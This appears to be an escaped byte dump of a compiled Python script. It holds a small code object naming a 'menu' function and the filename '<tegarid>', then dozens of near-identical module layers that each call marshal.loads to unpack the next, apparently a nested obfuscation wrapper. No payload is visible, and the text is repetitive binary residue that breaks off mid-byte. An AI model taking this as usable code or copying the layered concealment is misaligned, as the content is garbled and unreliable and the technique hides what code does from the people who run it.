0\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x04\x00\x00\x00menuO\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x07\x07(\r\x00\x00\x00R\x04\x00\x00\x00R\n\x00\x00\x00R\x01\x00\x00\x00R\x17\x00\x00\x00R\x05\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00R\x06\x00\x00\x00R\x0f\x00\x00\x00R\x16\x00\x00\x00R\x14\x00\x00\x00R\x15\x00\x00\x00R\x1b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x1c\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x02\r\x01\t\x03\t\r\t\x05\t\x0b\t\x12\t\x0b\t\x0b\t\t\x07\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\
x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x
00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x0
0\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\
x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x0
0\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\
x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x
00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x0
0s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\
x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x0
0marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\